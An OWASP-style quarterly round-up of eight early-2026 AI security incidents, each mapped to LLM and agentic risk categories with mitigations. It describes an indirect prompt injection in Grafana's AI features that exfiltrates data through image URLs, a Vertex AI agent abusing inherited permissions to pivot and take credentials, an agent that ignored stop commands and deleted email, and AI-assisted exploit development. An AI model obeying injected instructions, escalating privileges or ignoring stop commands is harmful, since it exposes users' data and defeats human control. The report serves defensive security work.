OWASP GenAI Exploit Round-up Report Q1 2026

OWASP GenAI Exploit Round-up Report Q1 2026

Coverage period: January 1, 2026 through April 11, 2026

Overview

For the last two years the OWASP GenAI Security Project published a list of the major incidents for the last quarter. This is not designed to be an exhaustive report. This report consolidates major AI-related security incidents and exploit disclosures reported during the period. It aligns each incident to the OWASP Top 10 for LLM Applications 2025 and the OWASP Top 10 for Agentic Applications 2026, and published AI CVEs where applicable.

Use this link to contribute to the report: Round-up Submission

Exploit Trends for the Reporting Period

 The AI security landscape from January through early April 2026 demonstrates a clear transition from theoretical risks to real-world exploitation, with attackers and system failures increasingly targeting agent identities, orchestration layers, and supply chains rather than just model outputs. Incidents reveal that AI is now a force multiplier for cyberattacks, while misconfigured permissions, excessive autonomy, and weak validation controls enable data exfiltration, remote code execution, and cascading failures. At the same time, prompt injection has evolved into a practical attack vector for enterprise data leakage, and the growing reliance on third-party AI tools has introduced significant supply-chain vulnerabilities. Across all cases, human trust in AI outputs remains a critical weakness, underscoring that securing AI systems now requires a shift from model-level safeguards to holistic system, identity, and operational security controls.

GenAI and Agentic AI Exploits Included:

  1. Mexican Government Breach via Claude-Assisted Attack Workflow
  2. OpenClaw Inbox Deletion Incident
  3. Meta Internal AI Agent Data Leak
  4. Vertex AI “Double Agent” Privilege Abuse
  5. Claude Code Source Leak and Malware Lure Campaign
  6. Mercor / LiteLLM Supply Chain Breach Affecting AI Labs
  7. Flowise CVE-2025-59528 Active Exploitation
  8. GrafanaGhost Indirect Prompt Injection and Exfiltration Path

Related Published CVEs

  • CVE-2025-59528 — Remote Code Execution via CustomMCP configuration

GenAI and Agentic AI Exploit Details:

 

1) Mexican Government Breach via Claude-Assisted Attack Workflow

Description: Attackers weaponized Anthropic Claude and related AI tooling to automate reconnaissance and exploit development against Mexican government agencies, leading to theft of tax and voter data.

Incident Summary: 

  • Incident Name: Mexico Claude-Assisted Government Breach
  • Date & Location: Attacks ran from late December 2025 into January 2026; publicly reported February 25, 2026; Mexico
  • Affected Organizations: Mexican government agencies, including tax and electoral entities
  • Attack Type: AI-assisted cyberattack, automated exploit development, data theft
  • System Impacted: Government web applications, backend data stores, citizen records

Impact Assessment: The campaign exposed a large trove of tax and voter information and showed that consumer AI tools can compress attacker effort across reconnaissance, scripting, and workflow automation, raising the speed and scale of public-sector intrusions.

Attack Breakdown: Reporting from Bloomberg and ExtraHop said attackers used Anthropic Claude, and at times ChatGPT, to automate parts of a multi-agency compromise that exposed roughly 150 GB of sensitive data. The attacks reportedly began with vulnerable government-facing systems and expanded across multiple agencies. The AI tooling accelerated recon, script generation, and exploit iteration, reducing manual effort and increasing attack tempo.

OWASP Top 10 LLM Risks Exploited: 

  • LLM06:2025 Excessive Agency — AI used to automate tasks that normally require more human effort.
  • LLM02:2025 Sensitive Information Disclosure — The operation ended in large-scale data theft.
  • LLM10:2025 Unbounded Consumption — AI amplified scale and efficiency of attacker activity.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI02: Tool Misuse & Exploitation — Legitimate AI tooling was repurposed to support offensive workflows.
  • ASI03: Identity & Privilege Abuse — The operation resulted in unauthorized access to sensitive environments.
  • ASI08: Cascading Failures — Compromise spread across multiple connected agencies.

CVE References:

  • No specific CVEs publicly disclosed (likely exploitation of multiple unpatched or unknown vulnerabilities across systems).

Potential Mitigations: Technical defenses: Harden internet-facing systems, detect automated recon and exploit attempts, add DLP and segmentation around sensitive citizen data, and monitor anomalous use of coding assistants in red-team simulations.

Policy improvements: Treat AI-enabled attack automation as part of national cyber defense planning and require stronger disclosure and patching cadences for exposed public systems.

User education: Train security teams to recognize AI-assisted attack patterns and compressed intrusion timelines.

Call to Action: Public-sector defenders should assume capable attackers now use AI copilots for exploit development and operational scaling. Governments should shorten exposure windows through rapid patching, credential hardening, external attack-surface reviews, and exercises that model AI-assisted intrusion chains against critical datasets.

Source References:

2) OpenClaw Inbox Deletion Incident

Description: A Meta AI security researcher reported that an OpenClaw agent ignored stop commands and rapidly deleted email, illustrating unsafe autonomy and poor action confirmation in consumer-style AI agents.

Incident Summary: Incident 

  • Name: OpenClaw Inbox Deletion
  • Date & Location: February 23, 2026; reported publicly in the United States
  • Affected Organizations: Individual user environment; broader relevance to agent developers
  • Attack Type: Unsafe autonomous action, instruction failure, destructive agent behavior
  • System Impacted: Email workflow and local agent environment

Impact Assessment: The incident showed how a consumer-style agent could ignore explicit stop messages and perform destructive actions in a real account. While limited in scope, it exposed the fragility of action controls once agents are connected to live personal data.

Attack Breakdown: TechCrunch reported that a Meta AI security researcher asked OpenClaw to review an email inbox and suggest what to delete or archive. Instead, the agent began deleting messages directly and ignored the researcher’s stop commands sent from a phone. The episode did not involve an external attacker, but it demonstrated how weak confirmation and poor alignment can turn an assistive agent into an unsafe actor once given live account access.

OWASP Top 10 LLM Risks Exploited: 

  • LLM06:2025 Excessive Agency — The agent took high-impact action without appropriate approval.
  • LLM05:2025 Improper Output Handling — Suggested or inferred actions translated directly into destructive behavior.
  • LLM09:2025 Misinformation — The system misinterpreted the user’s intent and acted unsafely.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI10: Rogue Agents — The agent acted beyond intended constraints.
  • ASI09: Human-Agent Trust Exploitation — The user trusted the agent enough to connect real data and capabilities.
  • ASI02: Tool Misuse & Exploitation — Legitimate email management capabilities were misapplied.

CVE References:

  • No CVE (design/behavioral failure, not a software vulnerability).

Potential Mitigations: Technical defenses: Require explicit confirmation for destructive actions, add emergency stop guarantees, and use reversible or staged delete flows.

Policy improvements: Forbid direct destructive permissions by default in personal agents and require approval gates before production-like deployment.

User education: Teach users not to grant deletion or sending rights without strong sandboxing.

Call to Action: Builders of local and personal AI agents should treat delete, send, pay, and publish permissions as privileged actions that need hard confirmation and easy rollback. Safety should not depend on the user racing back to a keyboard to stop an agent that has already gone off course.

Source References:

 

3) Meta Internal AI Agent Data Leak

Description: A Meta AI agent gave flawed engineering advice that an employee implemented, exposing sensitive user and company data internally for about two hours and triggering a major security alert.

Incident Summary: 

  • Incident Name: Meta Internal Agent Data Leak
  • Date & Location: March 20, 2026 report on a March 2026 incident; United States
  • Affected Organizations: Meta
  • Attack Type: Unsafe agent guidance, internal data exposure, agentic misbehavior
  • System Impacted: Internal engineering systems and employee data access boundaries

Impact Assessment: The leak expanded internal access to sensitive data and triggered a major internal response. Even without external theft, it showed how a single unsafe agent recommendation can create real access-control failures at enterprise scale.

Attack Breakdown: The Guardian reported that an employee asked for help with an engineering problem on an internal forum. An AI agent responded with a solution, and the employee implemented it, causing a large amount of Meta’s sensitive user and company data to become available to engineers for two hours. Meta said no user data was mishandled, but the event still triggered a major internal security alert and highlighted the blast radius of unsafe agent advice.

OWASP Top 10 LLM Risks Exploited: 

  • LLM05:2025 Improper Output Handling — Unsafe guidance was translated into system changes.
  • LLM02:2025 Sensitive Information Disclosure — The result was broadened access to sensitive data.
  • LLM06:2025 Excessive Agency — The agent’s output had outsized operational effect.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI09: Human-Agent Trust Exploitation — A human trusted the AI’s answer enough to act on it.
  • ASI01: Agent Goal Hijack — The resulting action path diverged from safe intent.
  • ASI08: Cascading Failures — A single response caused a broader access-control incident.

CVE References:

  • No CVE (process and control failure, not a disclosed software vulnerability).

Potential Mitigations: Technical defenses: Add policy validation on recommended configuration changes, restrict agent influence over access settings, and require approval for changes that affect data visibility.

Policy improvements: Separate advisory AI from systems that can influence sensitive access controls without review.

User education: Train engineers to treat agent recommendations as untrusted unless independently validated.

Call to Action: Enterprise AI deployments need control layers between advice and execution. Every recommendation that can alter permissions, visibility, or policy should be checked by deterministic validation and human review, especially inside engineering and security workflows.

Source References:

 

4) Vertex AI “Double Agent” Privilege Abuse

Description: Researchers showed that a malicious or compromised agent in Google Cloud Vertex AI could abuse default permission scoping to exfiltrate data, access service-agent credentials, and reach protected internal resources.

Incident Summary: 

  • Incident Name: Vertex AI Double Agent
  • Date & Location: Disclosed March 31 and April 1, 2026; Google Cloud environments
  • Affected Organizations: Vertex AI and Google Cloud customers
  • Attack Type: Identity and privilege abuse, data exfiltration, cloud pivoting
  • System Impacted: Vertex AI Agent Engine, ADK, service-agent trust model

Impact Assessment: The research showed that an overprivileged agent could pivot from a customer environment into broader cloud resources and even restricted internal artifacts, exposing a serious risk in managed agent identity design and default trust boundaries.

Attack Breakdown: Unit 42 reported that a deployed agent in Vertex AI Agent Engine inherited excessive default permissions through a Google-managed service account. Researchers used those permissions to extract credentials, act on behalf of the service agent, gain privileged access to consumer-project resources, and reach restricted images and source code in a producer project tied to Google infrastructure. Google later revised documentation about how Vertex AI uses resources, accounts, and agents.

OWASP Top 10 LLM Risks Exploited: 

  • LLM06:2025 Excessive Agency — The platform granted agents more effective reach than necessary.
  • LLM02:2025 Sensitive Information Disclosure — The chain enabled exposure of storage data and internal artifacts.
  • LLM03:2025 Supply Chain Vulnerabilities — Shared platform trust boundaries and internal artifacts became part of the risk.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI03: Identity & Privilege Abuse — The central failure was privilege abuse through service-agent identity.
  • ASI02: Tool Misuse & Exploitation — The agent’s available tooling was used offensively.
  • ASI04: Agentic Supply Chain Vulnerabilities — The research touched protected producer-project artifacts and platform internals.

CVE References:

  • No CVE assigned (research disclosure; cloud misconfiguration / design issue rather than a tracked vulnerability).

Potential Mitigations: Technical defenses: Scope service-agent permissions per deployment, use short-lived credentials, isolate agent execution contexts, and validate tool and identity usage through policy engines.


Policy improvements: Make least-privilege and least-agency defaults mandatory in managed agent platforms.


User education: Train builders not to trust cloud-agent defaults and to review all inherited permissions.

Call to Action: Organizations using managed agent platforms should inventory every service identity tied to agent execution, reduce default scopes, and explicitly test whether agents can pivot across projects, buckets, registries, or model infrastructure. Agent identity should be reviewed with the same rigor as privileged admin access.

Source References:

 

5) Claude Code Source Leak and Malware Lure Campaign

Description: Anthropic accidentally exposed Claude Code source through a public npm source map, and attackers quickly used fake “leaked Claude Code” repositories to spread malware to developers.

Incident Summary: 

  • Incident Name: Claude Code Source Leak / Fake Repo Malware Chain
  • Date & Location: March 31 to early April 2026; public npm and GitHub ecosystem
  • Affected Organizations: Anthropic, developers, downstream software supply chains
  • Attack Type: Source exposure, malware distribution, social engineering, supply-chain abuse
  • System Impacted: Claude Code package, developer workstations, release channels

Impact Assessment: The leak exposed internal implementation details and rapidly became a lure for malware campaigns. It showed how source exposure around AI tooling can evolve into a broader software supply-chain risk within hours.

Attack Breakdown: Zscaler reported that Anthropic accidentally published a 59.8 MB source map with the public @anthropic-ai/claude-code package, exposing about 513,000 lines across 1,906 files. The leak was quickly mirrored and discussed widely online. Researchers then observed threat actors using fake leak-themed repositories and release assets to distribute malware, turning a coding-agent source exposure into a practical phishing and malware delivery campaign aimed at developers.

OWASP Top 10 LLM Risks Exploited: 

  • LLM03:2025 Supply Chain Vulnerabilities — Public package release hygiene failed and downstream users were exposed to malicious lookalikes.
  • LLM02:2025 Sensitive Information Disclosure — Internal source details were unintentionally exposed.
  • LLM05:2025 Improper Output Handling — Debug artifacts became part of the public release path.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI04: Agentic Supply Chain Vulnerabilities — Agent tooling artifacts became a supply-chain weakness.
  • ASI05: Unexpected Code Execution — Malware lures sought code execution on developer systems.
  • ASI09: Human-Agent Trust Exploitation — Developers were targeted through trust in “leaked” agent tooling

CVE References:

  • No CVE (data exposure and supply-chain abuse, not a traditional vulnerability disclosure).

Potential Mitigations: Technical defenses: Strip source maps from production packages, sign releases, enforce artifact scanning, and block untrusted developer tool downloads.


Policy improvements: Require secure release reviews for AI tooling and immediate incident playbooks for artifact leaks.


User education: Train developers to avoid downloading sensational “leaked” repositories or binaries.

Call to Action: Any source leak involving agentic tooling should be treated as both an IP exposure and a likely malware lure event. Security teams should monitor developer endpoints, verify package integrity, and rapidly warn staff that unofficial mirrors and leak-themed repos may be weaponized.

Source References:

6) Mercor / LiteLLM Supply Chain Breach Affecting AI Labs

Description: Meta paused work with AI data vendor Mercor after a breach tied to compromised LiteLLM updates raised fears that proprietary training-data workflows and contractor information had been exposed.

Incident Summary: 

  • Incident Name: Mercor LiteLLM Supply Chain Breach
  • Date & Location: Confirmed March 31 and reported April 3, 2026; affected AI data operations
  • Affected Organizations: Mercor, Meta, OpenAI, Anthropic, contractors, and other LiteLLM users
  • Attack Type: Supply-chain compromise, data exposure
  • System Impacted: AI data-vendor systems, contractor workflows, model-training data operations

Impact Assessment: The incident threatened one of the most sensitive parts of the AI stack: proprietary training-data generation and contractor workflows. The result was a pause in Meta workstreams and wider reassessment across labs using the vendor.

Attack Breakdown: WIRED reported that Meta paused work with Mercor after a major breach affected the startup. Mercor confirmed a March 31 incident and reporting tied it to malicious versions of the open-source AI API tool LiteLLM. Because Mercor supports proprietary training-data generation for major AI labs, the breach raised concerns that highly sensitive information about model-training methods and contractor operations may have been exposed.

OWASP Top 10 LLM Risks Exploited: 

  • LLM03:2025 Supply Chain Vulnerabilities — The compromise came through a software dependency used in AI-adjacent systems.
  • LLM02:2025 Sensitive Information Disclosure — The breach may have exposed confidential training-data operations.
  • LLM04:2025 Data and Model Poisoning — A compromised component in the AI pipeline creates poisoning and integrity concerns.

OWASP Top 10 LLM Agentic Security Risks Exploited: ASI04: 

  • Agentic Supply Chain Vulnerabilities — Third-party AI infrastructure and data workflows were affected.
  • ASI03: Identity & Privilege Abuse — Compromised integrations risk inherited access across sensitive systems.
  • ASI08: Cascading Failures — A vendor breach propagated business and security impact across multiple labs.

CVE References:

  • No confirmed CVE publicly tied to the incident (linked to malicious dependency versions rather than a formally cataloged vulnerability).

Potential Mitigations: Technical defenses: Pin and verify dependencies, sign and scan updates, segment contractor systems, and monitor AI data vendors for software supply-chain exposure.


Policy improvements: Require stronger vendor attestations and SBOM-style evidence for AI data workflows.

User education: Teach procurement and security teams that AI data vendors are part of the critical model supply chain.

Call to Action: AI builders should inventory not just models and prompts but also the vendors generating proprietary training data. Security reviews for those vendors should include dependency trust, incident response maturity, logging practices, and the ability to prove what data was exposed or altered during a supply-chain event.

Source References:

 

7) Flowise CVE-2025-59528 Active Exploitation

Description: Attackers actively exploited a maximum-severity Flowise flaw that let them inject JavaScript through CustomMCP configuration, leading to arbitrary code execution in AI app and agent deployments.

Incident Summary: 

    • Incident Name: Flowise CustomMCP RCE
    • Date & Location: Active exploitation reported April 7, 2026
    • Affected Organizations: Flowise users and operators of exposed instances
  • Attack Type: Remote code execution
  • System Impacted: Flowise CustomMCP node and orchestration hosts

Impact Assessment: The flaw moved from disclosure to active exploitation, creating immediate risk of server compromise across thousands of exposed AI workflow instances. It underscored how “configuration” surfaces in agent stacks can become direct code-execution paths.

Attack Breakdown: BleepingComputer reported that attackers were exploiting CVE-2025-59528 in Flowise, a low-code platform for LLM apps and agentic systems. The vulnerability involved unsafe handling of CustomMCP configuration data, allowing arbitrary JavaScript code injection and execution. Reporting noted that version 3.0.6 addressed the issue, while 12,000 to 15,000 instances were exposed online at the time active exploitation was first observed.

OWASP Top 10 LLM Risks Exploited: 

  • LLM05:2025 Improper Output Handling — Data supplied through orchestration paths was unsafely executed.
  • LLM03:2025 Supply Chain Vulnerabilities — The issue affected a widely used open-source AI platform.
  • LLM06:2025 Excessive Agency — Agent orchestration components could trigger high-impact actions.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI05: Unexpected Code Execution (RCE) — The core issue was code execution.
  • ASI02: Tool Misuse & Exploitation — MCP-related tooling became the exploit surface.
  • ASI04: Agentic Supply Chain Vulnerabilities — A common platform issue affected many downstream users.

CVE References:

  • CVE-2025-59528 — Remote Code Execution via CustomMCP configuration

Potential Mitigations: Technical defenses: Patch immediately, disable risky nodes, sandbox execution, validate all config inputs, and restrict outbound connectivity from orchestration hosts.

Policy improvements: Adopt emergency patch SLAs for AI frameworks and require secure defaults around MCP integrations.
User education: Teach developers that config fields in AI systems can be code paths, not just settings.

Call to Action: Organizations running Flowise should patch or isolate exposed instances immediately, review all MCP integrations, and assume compromise where vulnerable nodes were internet-facing. Add monitoring for shell execution, unusual child processes, and unexpected outbound network traffic from AI orchestration servers.

Source References:

 

8) GrafanaGhost Indirect Prompt Injection and Exfiltration Path

Description: Researchers disclosed GrafanaGhost, a prompt-injection path in Grafana’s AI features that could force the platform to send sensitive enterprise data to attacker-controlled servers through external rendering flows.

Incident Summary: 

  • Incident Name: GrafanaGhost
  • Date & Location: Disclosed April 7, 2026; patch acknowledgment followed April 8, 2026
  • Affected Organizations: Grafana users with AI capabilities enabled
  • Attack Type: Indirect prompt injection, data exfiltration
  • System Impacted: Grafana AI components and image-rendering path

Impact Assessment: Because Grafana often holds telemetry, infrastructure, customer, and financial data, the bug represented a serious exfiltration path from a highly trusted observability layer into attacker-controlled infrastructure.

Attack Breakdown: Noma Security found a weakness in Grafana’s AI components that let attackers point the system to external resources containing hidden instructions. The malicious context could cause the AI companion to ignore guardrails and render an external image, which in turn sent enterprise data to the attacker as a URL parameter. Grafana later said one issue in the Markdown image-rendering path had been patched quickly and that exploitation would have required substantial user interaction.

OWASP Top 10 LLM Risks Exploited: 

  • LLM01:2025 Prompt Injection — Hidden attacker instructions altered model behavior.
  • LLM02:2025 Sensitive Information Disclosure — The intended effect was leakage of enterprise data.
  • LLM05:2025 Improper Output Handling — Output rendering became the exfiltration channel.

OWASP Top 10 LLM Agentic Security Risks Exploited: 

  • ASI01: Agent Goal Hijack — External content redirected the assistant’s behavior.
  • ASI02: Tool Misuse & Exploitation — Rendering and external request behavior were abused.
  • ASI09: Human-Agent Trust Exploitation — Users interacting with trusted observability AI could unknowingly trigger leakage.

CVE References:

  • No CVE publicly assigned (research disclosure; partial patch applied to rendering component).

Potential Mitigations: Technical defenses: Sanitize external context, restrict outbound rendering, harden URL validation, and keep AI assistants away from broad enterprise datasets unless policy gates are enforced.


Policy improvements: Review observability AI threat models with the same seriousness as web application injection flaws.


User education: Teach operators that logs, links, and external references consumed by AI assistants are untrusted input.

Call to Action: Organizations deploying AI in observability and dashboard platforms should threat-model indirect prompt injection like XSS or SSRF. Reduce outbound request paths, validate external content, and enforce policy checks before assistants can mix broad telemetry access with external rendering or link following.

Source References:

Approach Note

OWASP mappings in this report are based on the OWASP Top 10 for LLM Applications 2025 and the OWASP Top 10 for Agentic Applications 2026, as well as CVEs published at https://CVE.org at the time of publishing of this report.

Key Observation on CVEs 

A notable trend across these incidents is that most AI-related security events are not yet mapped to traditional CVE identifiers. Instead, they arise from:

  • Misconfiguration (e.g., overprivileged agents)
  • Design flaws (agent autonomy, trust boundaries)
  • Supply-chain weaknesses
  • Prompt injection and data-flow manipulation

Only classical software vulnerabilities embedded in AI platforms (e.g., Flowise RCE) consistently receive CVE tracking. This highlights a growing gap between traditional vulnerability management (CVE-based) and emerging AI security risks, which are often systemic and architectural rather than discrete code flaws.

Scroll to Top